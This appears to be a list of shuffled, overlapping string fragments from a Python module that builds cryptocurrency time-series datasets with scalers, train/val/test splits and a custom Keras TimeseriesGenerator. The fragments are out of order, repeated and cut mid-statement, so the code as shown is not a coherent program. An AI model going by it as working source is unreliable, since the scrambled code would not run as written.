"(df_train_len + self.dataset_profile.gap_timeframes) self.dataset.train_df = self.dataset.features_df.iloc[:df_train_len, :] if self.dataset_profile.train_size + self.dataset_profile.val_size == 1.0:",
"1 time to have solid data \"\"\" self.dataset.x_Test, self.dataset.y_Test = self.create_data_from_gen(x_Test_data, y_Test_data) #",
"sampling_rate=self.dataset_profile.tsg_sampling_rate, stride=self.dataset_profile.tsg_stride, start_index=self.dataset_profile.tsg_start_index, overlap=self.dataset_profile.tsg_overlap, ) return self.dataset.test_gen def create_close1_close2_power(self): if self.dataset_profile.scaler == \"robust\":",
"All data with chosen period loaded to memory Args: loader (DataLoad): object with",
"y_arr) pass def create_close1_close2_trend(self): if self.dataset_profile.scaler == \"robust\": self.dataset.features_scaler = RobustScaler().fit(self.dataset.features_df.values) self.dataset.targets_scaler =",
"self.dataset.val_gen def get_test_generator(self, x_Test_data, y_Test_data): self.dataset.test_gen = TSDataGenerator(data=x_Test_data, targets=y_Test_data, length=self.dataset_profile.tsg_window_length, sampling_rate=self.dataset_profile.tsg_sampling_rate, stride=self.dataset_profile.tsg_stride, start_index=self.dataset_profile.tsg_start_index,",
"> 0: offset_hour_msg = f\"+{offset_hour:.0f}\" return f'Etc/GMT{offset_hour_msg}' class TSDataGenerator(TimeseriesGenerator): def __init__(self, data, targets,",
"sampling_rate self.stride = stride self.start_index = start_index + length self.overlap = overlap if",
"self.length:row:self.sampling_rate] for row in rows]) # self.sample_shape = samples.shape targets = np.array([self.targets[row] for",
"x_Test_data, y_Test_data): self.dataset.test_gen = TSDataGenerator(data=x_Test_data, targets=y_Test_data, length=self.dataset_profile.tsg_window_length, sampling_rate=self.dataset_profile.tsg_sampling_rate, stride=self.dataset_profile.tsg_stride, start_index=self.dataset_profile.tsg_start_index, overlap=self.dataset_profile.tsg_overlap, ) return",
"sys.exit(msg) self.dataset.name = f'{self.dataset_profile.use_symbols_pairs[0]}-{self.dataset_profile.use_symbols_pairs[1]}-{self.dataset_profile.timeframe}' y_temp = self.dataset.y_df.values.reshape(-1, 1) if self.dataset_profile.scaler == \"robust\": self.dataset.features_scaler",
"self.dataset_profile.gap_timeframes) - (df_val_len + self.dataset_profile.gap_timeframes) self.dataset.val_df = self.dataset.features_df.iloc[ df_train_len + self.dataset_profile.gap_timeframes: df_val_len +",
"Usage for DataLoad class ------------------------ pairs_symbol = None -> Use all pairs in",
"test_len is None: x_Train_data = x_arr[train_len:, :] x_Val_data = x_arr[:train_len + self.dataset_profile.gap_timeframes, :]",
"self.features.create_y_close1_close2_sub_power() self.create_close1_close2_power() return self.dataset elif self.dataset_profile.Y_data == \"power_trend\": weight = self.dataset.dataset_profile.power_trend self.dataset.y_df =",
"-> Use all pairs in timeframe directory pairs_symbol = (\"BTCUSDT\", \"ETHUSDT\") -> Use",
"time_intervals=['15m'], source_directory=\"../source_root\", start_period='2021-11-01 00:00:00', end_period='2021-12-05 23:59:59', ) dataset_1_profile = DSProfile() dsc = DSCreator(loaded_crypto_data,",
"(DataLoad): object with data Returns: DSCreator (class): object \"\"\" self.features = DataFeatures(loader) self.dataset_profile",
"import sys import time import copy import pytz import numpy as np import",
"from this list to load start_period = None -> Use from [0:] of",
"msg = \"Error: Unknown scaler preparation type\" sys.exit(msg) x_arr = self.dataset.features_scaler.transform(self.dataset.features_df.values) \"\"\" check",
"import copy import pytz import numpy as np import datetime import pandas as",
"+ df_train_len + self.dataset_profile.gap_timeframes, :] self.dataset.test_df = self.dataset.features_df.iloc[df_rows - df_test_len:, :] return df_train_len,",
"DSProfile() self.dataset.features_df = self.features.collect_features(self.dataset_profile) self.dataset.name = f'{self.dataset_profile.use_symbols_pairs[0]}-{self.dataset_profile.use_symbols_pairs[1]}-{self.dataset_profile.timeframe}' if self.dataset_profile.Y_data == \"close1-close2\": self.dataset.y_df =",
"y_Test_data) \"\"\" Using generator 1 time to have solid data \"\"\" self.dataset.x_Test, self.dataset.y_Test",
"sampling_rate=self.dataset_profile.tsg_sampling_rate, stride=self.dataset_profile.tsg_stride, start_index=self.dataset_profile.tsg_start_index, overlap=self.dataset_profile.tsg_overlap, batch_size=x_arr.shape[0] ) for x_data, y_data in gen: continue return",
"= end_index self.shuffle = shuffle self.reverse = reverse self.batch_size = batch_size self.sample_shape =",
"tf from dataclasses import dataclass from analyze.dataload import DataLoad from datamodeling.datafeatures import DataFeatures,",
"+= overlap self.data = data self.targets = targets self.length = length self.sampling_rate =",
"plt import seaborn as sns import tensorflow as tf from dataclasses import dataclass",
"(class): object \"\"\" self.features = DataFeatures(loader) self.dataset_profile = dataset_profile self.dataset = DataSet() def",
"stride=self.dataset_profile.tsg_stride, start_index=self.dataset_profile.tsg_start_index, overlap=self.dataset_profile.tsg_overlap, ) return self.dataset.train_gen def get_val_generator(self, x_Val_data, y_Val_data): self.dataset.val_gen = TSDataGenerator(data=x_Val_data,",
"self.dataset.x_Val, self.dataset.y_Val = self.create_data_from_gen(x_Val_data, y_Val_data) self.dataset.input_shape = x_Val_gen.sample_shape pass def create_dataset(self) -> DataSet:",
"self.dataset.val_df = self.dataset.features_df.iloc[df_train_len + self.dataset_profile.gap_timeframes:, :] return df_train_len, df_val_len, None else: df_val_len =",
"start_index += overlap self.data = data self.targets = targets self.length = length self.sampling_rate",
"\"\"\" self.dataset.x_Test, self.dataset.y_Test = self.create_data_from_gen(x_Test_data, y_Test_data) # x_Test_gen = self.get_test_generator(x_Test_data, y_Test_data) \"\"\" Using",
"x_arr, y_arr): gen = TSDataGenerator(data=x_arr, targets=y_arr, length=self.dataset_profile.tsg_window_length, sampling_rate=self.dataset_profile.tsg_sampling_rate, stride=self.dataset_profile.tsg_stride, start_index=self.dataset_profile.tsg_start_index, overlap=self.dataset_profile.tsg_overlap, batch_size=x_arr.shape[0] )",
"= TSDataGenerator(data=x_Test_data, targets=y_Test_data, length=self.dataset_profile.tsg_window_length, sampling_rate=self.dataset_profile.tsg_sampling_rate, stride=self.dataset_profile.tsg_stride, start_index=self.dataset_profile.tsg_start_index, overlap=self.dataset_profile.tsg_overlap, ) return self.dataset.test_gen def create_close1_close2_power(self):",
"x_Train_data = x_arr[train_len:, :] x_Val_data = x_arr[:train_len + self.dataset_profile.gap_timeframes, :] y_Train_data = y_arr[train_len:,",
"import Tuple from sklearn.preprocessing import StandardScaler from sklearn.preprocessing import MinMaxScaler from sklearn.preprocessing import",
"+ self.dataset_profile.gap_timeframes) - (df_val_len + self.dataset_profile.gap_timeframes) self.dataset.val_df = self.dataset.features_df.iloc[ df_train_len + self.dataset_profile.gap_timeframes: df_val_len",
":] self.dataset.test_df = self.dataset.features_df.iloc[df_rows - df_test_len:, :] return df_train_len, df_val_len, df_test_len def get_train_generator(self,",
"Use until [:-1] of historical data end_period = '2021-12-05 23:59:59' -> Use until",
"RobustScaler().fit(y_temp) else: msg = \"Error: Unknown scaler preparation type\" sys.exit(msg) x_arr = self.dataset.features_scaler.transform(self.dataset.features_df.values)",
"samples = np.array([self.data[row - self.overlap - self.length:row:self.sampling_rate] for row in rows]) # self.sample_shape",
"+ 1, size=self.batch_size) else: i = (self.start_index + self.batch_size * self.stride * index)",
"path_filename): pass if __name__ == \"__main__\": \"\"\" Usage for DataLoad class ------------------------ pairs_symbol",
"sys.exit(msg) x_arr = self.dataset.features_scaler.transform(self.dataset.features_df.values) \"\"\" check \"\"\" y_arr = self.dataset.targets_scaler.transform(y_temp) self.prepare_datagens(x_arr, y_arr) return",
"if time.daylight: offset_hour = time.altzone / 3600 else: offset_hour = time.timezone / 3600",
"= self.dataset.features_df.iloc[df_train_len + self.dataset_profile.gap_timeframes:, :] return df_train_len, df_val_len, None else: df_val_len = int(df_rows",
"-> Use all timeframes directories for loading (with pairs_symbols) time_intervals = ['15m'] ->",
"import numpy as np import datetime import pandas as pd from typing import",
"calc_shape(self): index = 0 i = (self.start_index + self.batch_size * self.stride * index)",
"self.dataset.features_scaler.transform(self.dataset.features_df.values) \"\"\" check \"\"\" y_arr = self.dataset.y_df.values self.prepare_datagens(x_arr, y_arr) pass def create_close1_close2_trend(self): if",
"= self.dataset.features_scaler.transform(self.dataset.features_df.values) \"\"\" check \"\"\" y_arr = self.dataset.y_df.values self.prepare_datagens(x_arr, y_arr) pass def prepare_datagens(self,",
"from sklearn.preprocessing import OneHotEncoder from sklearn.preprocessing import FunctionTransformer from tensorflow.keras.preprocessing.sequence import TimeseriesGenerator import",
"be left to be used as current step.' % (self.start_index, self.end_index)) self.sample_shape =",
"import seaborn as sns import tensorflow as tf from dataclasses import dataclass from",
"y_arr[train_len:, :] y_Val_data = y_arr[:train_len + self.dataset_profile.gap_timeframes, :] else: x_Train_data = x_arr[train_len:, :]",
"= len(data) - 1 self.end_index = end_index self.shuffle = shuffle self.reverse = reverse",
"if self.dataset_profile.Y_data == \"close1-close2\": self.dataset.y_df = self.features.create_y_close1_close2_sub() elif self.dataset_profile.Y_data == \"close1-close2_trend\": self.dataset.y_df =",
"self.sample_shape = None if self.start_index > self.end_index: raise ValueError('`start_index+length=%i > end_index=%i` ' 'is",
"ValueError('Data and targets have to be' + ' of same length. ' 'Data",
"self.x_Train, self.y_Train def get_val(self): if (self.x_Val is not None) and (self.y_Val is not",
"self.dataset_profile.gap_timeframes:, :] return df_train_len, df_val_len, None else: df_val_len = int(df_rows * self.dataset_profile.val_size) df_test_len",
"self.batch_size * self.stride, self.end_index + 1), self.stride) samples = np.array([self.data[row - self.overlap -",
"not None) and (self.y_Test is not None): return self.x_Test, self.y_Test class DSCreator: \"\"\"",
"* self.stride * index) rows = np.arange(i, min(i + self.batch_size * self.stride, self.end_index",
":] return df_train_len, df_val_len, None else: df_val_len = int(df_rows * self.dataset_profile.val_size) df_test_len =",
"pairs_symbol = None -> Use all pairs in timeframe directory pairs_symbol = (\"BTCUSDT\",",
"reverse self.batch_size = batch_size self.sample_shape = None if self.start_index > self.end_index: raise ValueError('`start_index+length=%i",
"(self.y_Val is not None): return self.x_Val, self.y_Val def get_test(self): if (self.x_Test is not",
"val_len, :] y_Test_data = y_arr[x_arr.shape[0] - test_len:, :] x_Test_gen = self.get_test_generator(x_Test_data, y_Test_data) \"\"\"",
"int(df_rows * self.dataset_profile.train_size) df_val_len = df_rows - (df_train_len + self.dataset_profile.gap_timeframes) self.dataset.train_df = self.dataset.features_df.iloc[:df_train_len,",
"def get_test(self): if (self.x_Test is not None) and (self.y_Test is not None): return",
"if (self.x_Val is not None) and (self.y_Val is not None): return self.x_Val, self.y_Val",
"import pytz import numpy as np import datetime import pandas as pd from",
"not None) and (self.y_Train is not None): return self.x_Train, self.y_Train def get_val(self): if",
"sklearn.preprocessing import LabelEncoder from sklearn.preprocessing import LabelBinarizer from sklearn.preprocessing import OneHotEncoder from sklearn.preprocessing",
"{}'.format(len(targets))) if overlap >= length: raise ValueError(f'`overlap={overlap} >= length={length}` is disallowed') if overlap",
"data Returns: DSCreator (class): object \"\"\" self.features = DataFeatures(loader) self.dataset_profile = dataset_profile self.dataset",
"else: df_val_len = int(df_rows * self.dataset_profile.val_size) df_test_len = df_rows - (df_train_len + self.dataset_profile.gap_timeframes)",
"end_period = None -> Use until [:-1] of historical data end_period = '2021-12-05",
"offset_hour_msg = f\"+{offset_hour:.0f}\" return f'Etc/GMT{offset_hour_msg}' class TSDataGenerator(TimeseriesGenerator): def __init__(self, data, targets, length, sampling_rate=1,",
"self.stride, self.end_index + 1), self.stride) samples = np.array([self.data[row - self.overlap - self.length:row:self.sampling_rate] for",
"= 0 i = (self.start_index + self.batch_size * self.stride * index) rows =",
"self.y_Test = None self.features_scaler = object self.targets_scaler = object self.train_gen = None self.val_gen",
"self.dataset_profile.Y_data == \"close1-close2\": self.dataset.y_df = self.features.create_y_close1_close2_sub() elif self.dataset_profile.Y_data == \"close1-close2_trend\": self.dataset.y_df = self.features.create_y_close1_close2_sub_trend()",
"time.timezone / 3600 offset_hour_msg = f\"{offset_hour:.0f}\" if offset_hour > 0: offset_hour_msg = f\"+{offset_hour:.0f}\"",
"not None): return self.x_Val, self.y_Val def get_test(self): if (self.x_Test is not None) and",
"x_Test_data = x_arr[x_arr.shape[0] - test_len:, :] y_Train_data = y_arr[train_len:, :] y_Val_data = y_arr[train_len",
"scaler preparation type\" sys.exit(msg) x_arr = self.dataset.features_scaler.transform(self.dataset.features_df.values) \"\"\" check \"\"\" y_arr = self.dataset.y_df.values",
"+ self.dataset_profile.gap_timeframes, :] y_Train_data = y_arr[train_len:, :] y_Val_data = y_arr[:train_len + self.dataset_profile.gap_timeframes, :]",
"list to load start_period = None -> Use from [0:] of historical data",
"self.prepare_datagens(x_arr, y_arr) pass def prepare_datagens(self, x_arr, y_arr): train_len, val_len, test_len = self.split_data_df() if",
"::-1, ...], targets return samples, targets @dataclass class DataSet: def __init__(self): self.name: str",
"targets=y_Train_data, length=self.dataset_profile.tsg_window_length, sampling_rate=self.dataset_profile.tsg_sampling_rate, stride=self.dataset_profile.tsg_stride, start_index=self.dataset_profile.tsg_start_index, overlap=self.dataset_profile.tsg_overlap, ) return self.dataset.train_gen def get_val_generator(self, x_Val_data, y_Val_data):",
"check \"\"\" y_arr = self.dataset.targets_scaler.transform(y_temp) self.prepare_datagens(x_arr, y_arr) return self.dataset def create_data_from_gen(self, x_arr, y_arr):",
"None pass def get_train(self): if (self.x_Train is not None) and (self.y_Train is not",
"f'Etc/GMT{offset_hour_msg}' class TSDataGenerator(TimeseriesGenerator): def __init__(self, data, targets, length, sampling_rate=1, stride=1, start_index=0, overlap=0, end_index=None,",
"% (self.start_index, self.end_index)) self.sample_shape = self.calc_shape() pass def calc_shape(self): index = 0 i",
"datetime import pandas as pd from typing import Tuple from sklearn.preprocessing import StandardScaler",
"StandardScaler from sklearn.preprocessing import MinMaxScaler from sklearn.preprocessing import RobustScaler from sklearn.preprocessing import LabelEncoder",
"save_dataset_arrays(self, path_filename): pass if __name__ == \"__main__\": \"\"\" Usage for DataLoad class ------------------------",
"get_train(self): if (self.x_Train is not None) and (self.y_Train is not None): return self.x_Train,",
"have solid data \"\"\" self.dataset.x_Test, self.dataset.y_Test = self.create_data_from_gen(x_Test_data, y_Test_data) # x_Test_gen = self.get_test_generator(x_Test_data,",
"length: raise ValueError(f'`overlap={overlap} >= length={length}` is disallowed') if overlap > 0: start_index +=",
"self.start_index, self.end_index + 1, size=self.batch_size) else: i = (self.start_index + self.batch_size * self.stride",
"' while target length is {}'.format(len(targets))) if overlap >= length: raise ValueError(f'`overlap={overlap} >=",
"self.dataset.features_df = self.features.collect_features(self.dataset_profile) self.dataset.name = f'{self.dataset_profile.use_symbols_pairs[0]}-{self.dataset_profile.use_symbols_pairs[1]}-{self.dataset_profile.timeframe}' if self.dataset_profile.Y_data == \"close1-close2\": self.dataset.y_df = self.features.create_y_close1_close2_sub()",
"y_arr): gen = TSDataGenerator(data=x_arr, targets=y_arr, length=self.dataset_profile.tsg_window_length, sampling_rate=self.dataset_profile.tsg_sampling_rate, stride=self.dataset_profile.tsg_stride, start_index=self.dataset_profile.tsg_start_index, overlap=self.dataset_profile.tsg_overlap, batch_size=x_arr.shape[0] ) for",
"self.dataset.y_Val = self.create_data_from_gen(x_Val_data, y_Val_data) self.dataset.input_shape = x_Val_gen.sample_shape pass def create_dataset(self) -> DataSet: self.dataset.dataset_profile",
"for x_data, y_data in gen: continue return x_data, y_data def save_dataset_arrays(self, path_filename): pass",
"(profile) \"\"\" def __init__(self, loader: DataLoad, dataset_profile: DSProfile): \"\"\" Getting object with OHLCV",
"time to have solid data \"\"\" self.dataset.x_Test, self.dataset.y_Test = self.create_data_from_gen(x_Test_data, y_Test_data) # x_Test_gen",
"{}'.format(len(data)) + ' while target length is {}'.format(len(targets))) if overlap >= length: raise",
"def get_val(self): if (self.x_Val is not None) and (self.y_Val is not None): return",
"len(data) != len(targets): raise ValueError('Data and targets have to be' + ' of",
"targets self.length = length self.sampling_rate = sampling_rate self.stride = stride self.start_index = start_index",
"generator 1 time to have solid data \"\"\" x_Train_gen = self.get_train_generator(x_Train_data, y_Train_data) x_Val_gen",
"(\"BTCUSDT\", \"ETHUSDT\") -> Use only this pairs to load time_intervals = None ->",
"self.stride = stride self.start_index = start_index + length self.overlap = overlap if end_index",
"dataclass from analyze.dataload import DataLoad from datamodeling.datafeatures import DataFeatures, DSProfile __version__ = 0.0010",
"None self.features_scaler = object self.targets_scaler = object self.train_gen = None self.val_gen = None",
"y_Train_data = y_arr[train_len:, :] y_Val_data = y_arr[:train_len + self.dataset_profile.gap_timeframes, :] else: x_Train_data =",
"== \"robust\": self.dataset.features_scaler = RobustScaler().fit(self.dataset.features_df.values) self.dataset.targets_scaler = RobustScaler().fit(y_temp) else: msg = \"Error: Unknown",
"' 'is disallowed, as no part of the sequence ' 'would be left",
"None if self.start_index > self.end_index: raise ValueError('`start_index+length=%i > end_index=%i` ' 'is disallowed, as",
"LabelEncoder from sklearn.preprocessing import LabelBinarizer from sklearn.preprocessing import OneHotEncoder from sklearn.preprocessing import FunctionTransformer",
"from datamodeling.datafeatures import DataFeatures, DSProfile __version__ = 0.0010 def get_local_timezone_name(): if time.daylight: offset_hour",
"= None self.x_Test = None self.y_Test = None self.features_scaler = object self.targets_scaler =",
"create_close1_close2_power(self): if self.dataset_profile.scaler == \"robust\": self.dataset.features_scaler = RobustScaler().fit(self.dataset.features_df.values) self.dataset.targets_scaler = None else: msg",
"= self.dataset.features_df.iloc[df_rows - df_test_len:, :] return df_train_len, df_val_len, df_test_len def get_train_generator(self, x_Train_data, y_Train_data):",
"self.name: str = '' self.dataset_profile = DSProfile() self.features_df = None self.y_df = None",
"train_len, val_len, test_len = self.split_data_df() if test_len is None: x_Train_data = x_arr[train_len:, :]",
":] x_Val_data = x_arr[train_len + self.dataset_profile.gap_timeframes:train_len + self.dataset_profile.gap_timeframes + val_len, :] x_Test_data =",
"= np.array([self.data[row - self.overlap - self.length:row:self.sampling_rate] for row in rows]) # self.sample_shape =",
"pass def prepare_datagens(self, x_arr, y_arr): train_len, val_len, test_len = self.split_data_df() if test_len is",
"+ ' of same length. ' 'Data length is {}'.format(len(data)) + ' while",
"= time.altzone / 3600 else: offset_hour = time.timezone / 3600 offset_hour_msg = f\"{offset_hour:.0f}\"",
"None self.x_Train = None self.y_Train = None self.x_Val = None self.y_Val = None",
"self.dataset.features_df.iloc[:df_train_len, :] if self.dataset_profile.train_size + self.dataset_profile.val_size == 1.0: self.dataset.val_df = self.dataset.features_df.iloc[df_train_len + self.dataset_profile.gap_timeframes:,",
"disallowed, as no part of the sequence ' 'would be left to be",
"- (df_train_len + self.dataset_profile.gap_timeframes) - (df_val_len + self.dataset_profile.gap_timeframes) self.dataset.val_df = self.dataset.features_df.iloc[ df_train_len +",
"load time_intervals = None -> Use all timeframes directories for loading (with pairs_symbols)",
"= y_arr[x_arr.shape[0] - test_len:, :] x_Test_gen = self.get_test_generator(x_Test_data, y_Test_data) \"\"\" Using generator 1",
"\"robust\": self.dataset.features_scaler = RobustScaler().fit(self.dataset.features_df.values) self.dataset.targets_scaler = None else: msg = \"Error: Unknown scaler",
"x_arr[train_len:, :] x_Val_data = x_arr[train_len + self.dataset_profile.gap_timeframes:train_len + self.dataset_profile.gap_timeframes + val_len, :] x_Test_data",
"None self.y_Val = None self.x_Test = None self.y_Test = None self.features_scaler = object",
"\"\"\" self.features = DataFeatures(loader) self.dataset_profile = dataset_profile self.dataset = DataSet() def split_data_df(self): df_rows",
"def create_close1_close2_trend(self): if self.dataset_profile.scaler == \"robust\": self.dataset.features_scaler = RobustScaler().fit(self.dataset.features_df.values) self.dataset.targets_scaler = None else:",
"= np.arange(i, min(i + self.batch_size * self.stride, self.end_index + 1), self.stride) samples =",
"None -> Use all timeframes directories for loading (with pairs_symbols) time_intervals = ['15m']",
"offset_hour > 0: offset_hour_msg = f\"+{offset_hour:.0f}\" return f'Etc/GMT{offset_hour_msg}' class TSDataGenerator(TimeseriesGenerator): def __init__(self, data,",
"overlap=self.dataset_profile.tsg_overlap, ) return self.dataset.train_gen def get_val_generator(self, x_Val_data, y_Val_data): self.dataset.val_gen = TSDataGenerator(data=x_Val_data, targets=y_Val_data, length=self.dataset_profile.tsg_window_length,",
"data \"\"\" self.dataset.x_Test, self.dataset.y_Test = self.create_data_from_gen(x_Test_data, y_Test_data) # x_Test_gen = self.get_test_generator(x_Test_data, y_Test_data) \"\"\"",
"self.dataset_profile.gap_timeframes: df_val_len + df_train_len + self.dataset_profile.gap_timeframes, :] self.dataset.test_df = self.dataset.features_df.iloc[df_rows - df_test_len:, :]",
"is not None): return self.x_Test, self.y_Test class DSCreator: \"\"\" Class for dataset creation",
"self.get_test_generator(x_Test_data, y_Test_data) \"\"\" Using generator 1 time to have solid data \"\"\" self.dataset.x_Test,",
"= self.dataset.features_df.iloc[ df_train_len + self.dataset_profile.gap_timeframes: df_val_len + df_train_len + self.dataset_profile.gap_timeframes, :] self.dataset.test_df =",
"length=self.dataset_profile.tsg_window_length, sampling_rate=self.dataset_profile.tsg_sampling_rate, stride=self.dataset_profile.tsg_stride, start_index=self.dataset_profile.tsg_start_index, overlap=self.dataset_profile.tsg_overlap, batch_size=x_arr.shape[0] ) for x_data, y_data in gen: continue",
"self.create_data_from_gen(x_Test_data, y_Test_data) # x_Test_gen = self.get_test_generator(x_Test_data, y_Test_data) \"\"\" Using generator 1 time to",
"rows]) if self.reverse: return samples[:, ::-1, ...], targets return samples, targets @dataclass class",
"overlap self.data = data self.targets = targets self.length = length self.sampling_rate = sampling_rate",
"RobustScaler from sklearn.preprocessing import LabelEncoder from sklearn.preprocessing import LabelBinarizer from sklearn.preprocessing import OneHotEncoder",
"self.x_Test = None self.y_Test = None self.features_scaler = object self.targets_scaler = object self.train_gen",
"= f\"{offset_hour:.0f}\" if offset_hour > 0: offset_hour_msg = f\"+{offset_hour:.0f}\" return f'Etc/GMT{offset_hour_msg}' class TSDataGenerator(TimeseriesGenerator):",
"configuration we are using DSConstants dataclass (profile) \"\"\" def __init__(self, loader: DataLoad, dataset_profile:",
"= start_index + length self.overlap = overlap if end_index is None: end_index =",
"datamodeling.datafeatures import DataFeatures, DSProfile __version__ = 0.0010 def get_local_timezone_name(): if time.daylight: offset_hour =",
"tensorflow as tf from dataclasses import dataclass from analyze.dataload import DataLoad from datamodeling.datafeatures",
"self.end_index)) self.sample_shape = self.calc_shape() pass def calc_shape(self): index = 0 i = (self.start_index",
"TSDataGenerator(data=x_Val_data, targets=y_Val_data, length=self.dataset_profile.tsg_window_length, sampling_rate=self.dataset_profile.tsg_sampling_rate, stride=self.dataset_profile.tsg_stride, start_index=self.dataset_profile.tsg_start_index, overlap=self.dataset_profile.tsg_overlap, ) return self.dataset.val_gen def get_test_generator(self, x_Test_data,",
"self.dataset_profile.gap_timeframes, :] else: x_Train_data = x_arr[train_len:, :] x_Val_data = x_arr[train_len + self.dataset_profile.gap_timeframes:train_len +",
"if self.dataset_profile.scaler == \"robust\": self.dataset.features_scaler = RobustScaler().fit(self.dataset.features_df.values) self.dataset.targets_scaler = RobustScaler().fit(y_temp) else: msg =",
"disallowed') if overlap > 0: start_index += overlap self.data = data self.targets =",
"x_Val_data = x_arr[train_len + self.dataset_profile.gap_timeframes:train_len + self.dataset_profile.gap_timeframes + val_len, :] x_Test_data = x_arr[x_arr.shape[0]",
"preparation type\" sys.exit(msg) self.dataset.name = f'{self.dataset_profile.use_symbols_pairs[0]}-{self.dataset_profile.use_symbols_pairs[1]}-{self.dataset_profile.timeframe}' y_temp = self.dataset.y_df.values.reshape(-1, 1) if self.dataset_profile.scaler ==",
"sys import time import copy import pytz import numpy as np import datetime",
"Unknown scaler preparation type\" sys.exit(msg) x_arr = self.dataset.features_scaler.transform(self.dataset.features_df.values) \"\"\" check \"\"\" y_arr =",
"x_Val_data, y_Val_data): self.dataset.val_gen = TSDataGenerator(data=x_Val_data, targets=y_Val_data, length=self.dataset_profile.tsg_window_length, sampling_rate=self.dataset_profile.tsg_sampling_rate, stride=self.dataset_profile.tsg_stride, start_index=self.dataset_profile.tsg_start_index, overlap=self.dataset_profile.tsg_overlap, ) return",
"y_arr[train_len + self.dataset_profile.gap_timeframes:train_len + self.dataset_profile.gap_timeframes + val_len, :] y_Test_data = y_arr[x_arr.shape[0] - test_len:,",
"df_train_len, df_val_len, df_test_len def get_train_generator(self, x_Train_data, y_Train_data): self.dataset.train_gen = TSDataGenerator(data=x_Train_data, targets=y_Train_data, length=self.dataset_profile.tsg_window_length, sampling_rate=self.dataset_profile.tsg_sampling_rate,",
"self.end_index + 1), self.stride) samples = np.array([self.data[row - self.overlap - self.length:row:self.sampling_rate] for row",
"rows]) # self.sample_shape = samples.shape targets = np.array([self.targets[row] for row in rows]) if",
"def __init__(self, data, targets, length, sampling_rate=1, stride=1, start_index=0, overlap=0, end_index=None, shuffle=False, reverse=False, batch_size=128):",
"to be' + ' of same length. ' 'Data length is {}'.format(len(data)) +",
"= None self.y_Test = None self.features_scaler = object self.targets_scaler = object self.train_gen =",
"batch_size=128): super().__init__(data, targets, length, sampling_rate, stride, start_index, end_index, shuffle, reverse, batch_size) if len(data)",
"else: msg = \"Error: Unknown scaler preparation type\" sys.exit(msg) x_arr = self.dataset.features_scaler.transform(self.dataset.features_df.values) \"\"\"",
"memory Args: loader (DataLoad): object with data Returns: DSCreator (class): object \"\"\" self.features",
"data (symbols and timeframes). All data with chosen period loaded to memory Args:",
"= x_arr[train_len:, :] x_Val_data = x_arr[:train_len + self.dataset_profile.gap_timeframes, :] y_Train_data = y_arr[train_len:, :]",
"self.dataset.x_Train, self.dataset.y_Train = self.create_data_from_gen(x_Train_data, y_Train_data) self.dataset.x_Val, self.dataset.y_Val = self.create_data_from_gen(x_Val_data, y_Val_data) self.dataset.input_shape = x_Val_gen.sample_shape",
"self.create_data_from_gen(x_Val_data, y_Val_data) self.dataset.input_shape = x_Val_gen.sample_shape pass def create_dataset(self) -> DataSet: self.dataset.dataset_profile = DSProfile()",
"timeframes directory \"\"\" loaded_crypto_data = DataLoad(pairs_symbols=None, time_intervals=['15m'], source_directory=\"../source_root\", start_period='2021-11-01 00:00:00', end_period='2021-12-05 23:59:59', )",
"super().__init__(data, targets, length, sampling_rate, stride, start_index, end_index, shuffle, reverse, batch_size) if len(data) !=",
"df_val_len = int(df_rows * self.dataset_profile.val_size) df_test_len = df_rows - (df_train_len + self.dataset_profile.gap_timeframes) -",
"== \"power_trend\": weight = self.dataset.dataset_profile.power_trend self.dataset.y_df = self.features.create_power_trend(weight) self.create_power_trend() return self.dataset else: msg",
"type\" sys.exit(msg) x_arr = self.dataset.features_scaler.transform(self.dataset.features_df.values) \"\"\" check \"\"\" y_arr = self.dataset.targets_scaler.transform(y_temp) self.prepare_datagens(x_arr, y_arr)",
"is None: x_Train_data = x_arr[train_len:, :] x_Val_data = x_arr[:train_len + self.dataset_profile.gap_timeframes, :] y_Train_data",
"x_Train_gen = self.get_train_generator(x_Train_data, y_Train_data) x_Val_gen = self.get_val_generator(x_Val_data, y_Val_data) self.dataset.x_Train, self.dataset.y_Train = self.create_data_from_gen(x_Train_data, y_Train_data)",
"= TSDataGenerator(data=x_Val_data, targets=y_Val_data, length=self.dataset_profile.tsg_window_length, sampling_rate=self.dataset_profile.tsg_sampling_rate, stride=self.dataset_profile.tsg_stride, start_index=self.dataset_profile.tsg_start_index, overlap=self.dataset_profile.tsg_overlap, ) return self.dataset.val_gen def get_test_generator(self,",
"\"\"\" x_Train_gen = self.get_train_generator(x_Train_data, y_Train_data) x_Val_gen = self.get_val_generator(x_Val_data, y_Val_data) self.dataset.x_Train, self.dataset.y_Train = self.create_data_from_gen(x_Train_data,",
"y_Train_data): self.dataset.train_gen = TSDataGenerator(data=x_Train_data, targets=y_Train_data, length=self.dataset_profile.tsg_window_length, sampling_rate=self.dataset_profile.tsg_sampling_rate, stride=self.dataset_profile.tsg_stride, start_index=self.dataset_profile.tsg_start_index, overlap=self.dataset_profile.tsg_overlap, ) return self.dataset.train_gen",
"to memory Args: loader (DataLoad): object with data Returns: DSCreator (class): object \"\"\"",
"df_train_len, df_val_len, None else: df_val_len = int(df_rows * self.dataset_profile.val_size) df_test_len = df_rows -",
"self.dataset_profile.gap_timeframes, :] self.dataset.test_df = self.dataset.features_df.iloc[df_rows - df_test_len:, :] return df_train_len, df_val_len, df_test_len def",
"self.dataset_profile.Y_data == \"close1-close2_power\": self.dataset.y_df = self.features.create_y_close1_close2_sub_power() self.create_close1_close2_power() return self.dataset elif self.dataset_profile.Y_data == \"power_trend\":",
"os import sys import time import copy import pytz import numpy as np",
"= int(df_rows * self.dataset_profile.val_size) df_test_len = df_rows - (df_train_len + self.dataset_profile.gap_timeframes) - (df_val_len",
"+ 1), self.stride) samples = np.array([self.data[row - self.overlap - self.length:row:self.sampling_rate] for row in",
"None): return self.x_Val, self.y_Val def get_test(self): if (self.x_Test is not None) and (self.y_Test",
"solid data \"\"\" self.dataset.x_Test, self.dataset.y_Test = self.create_data_from_gen(x_Test_data, y_Test_data) # x_Test_gen = self.get_test_generator(x_Test_data, y_Test_data)",
"DataFeatures, DSProfile __version__ = 0.0010 def get_local_timezone_name(): if time.daylight: offset_hour = time.altzone /",
"elif self.dataset_profile.Y_data == \"close1-close2_trend\": self.dataset.y_df = self.features.create_y_close1_close2_sub_trend() self.create_close1_close2_trend() return self.dataset elif self.dataset_profile.Y_data ==",
"np.arange(i, min(i + self.batch_size * self.stride, self.end_index + 1), self.stride) samples = np.array([self.data[row",
"batch_size=x_arr.shape[0] ) for x_data, y_data in gen: continue return x_data, y_data def save_dataset_arrays(self,",
"= None pass def get_train(self): if (self.x_Train is not None) and (self.y_Train is",
